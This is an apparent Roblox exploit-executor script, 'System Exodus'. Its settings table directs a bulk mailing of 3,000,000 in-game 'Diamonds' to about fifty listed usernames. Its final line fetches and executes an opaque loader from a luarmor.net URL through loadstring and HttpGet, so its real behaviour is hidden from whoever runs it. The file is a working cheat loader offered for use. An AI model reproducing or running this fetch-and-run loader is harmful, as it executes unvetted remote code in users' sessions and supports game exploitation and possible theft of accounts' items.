getgenv().Settings = {
    Mailing = {


        ["Diamonds"] = {Class = "Currency", Amount = 3000000},

    },
    Users = {
"Virtualoperator48t",
"PixelData6UV",
"Solarrunner_4DZVTv",
"cyberprogram_1fQE2r3",
"Avatar5J0PGrJ0c1z4D",
"Nano_algorithmQ9",
"rider99Yt8dLgHW1",
"Modern_Protocol7YPT",
"Tech_cipher65Fx7ON",
"tech_OperatorTk",
"synthetic_Ninja9Xyg2",
"Tech_Blade99T",
"WizardJhERAVCRG0bK",
"roboticnetwork9",
"atomic_Wave2x0Kst",
"wardenMwcKM20l8R366",
"nano8adRkW6D1fRPU",
"pixelAvatar_4Fw",
"syntheticZs5",
"stellarBot4Q",
"ElectroCipher4",
"nanoZone_6Jq5x",
"CyberiLgJ0IHfo",
"robo_shadow40Eca",
"virtualDrone64A",
"Cyber_Protocol6x82",
"Nanoprotocol_78qnj",
"Algorithm15wbDbjM",
"Digital2M1FYryNd",
"Modern0mo",
"System47884OuA4rOr",
"Cosmicsignal1VP",
"nano_virus3h",
"futuristic_rideri",
"Drone26AVw8MIved",
"Quantum_System31uc3e",
"cyberUEWDD",
"core93cxfmi9ymje5C",
"cyber_shadowrf",
"Tech_Bot91iQTlgU",
"AtomicbyteEjSqGo",
"Roboticbyte51geV",
"dynamic_Synth69dVuM",
"NetworkihJEnK99B9a",
"Hyper_Shadow8Zx8o",
"modern1HWxA",
"CipherNRUd162s",
"Pixelphaser_8YJJ3",
"Electrovortex541M",
"Algorithm61TYD79F",
    },
    ["Split Items Evenly"] = false, --// False -> it will send the Amount per account.
    ["Only Online Accounts"] = false,

    [[ Thank you for using System Exodus <3! ]]
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
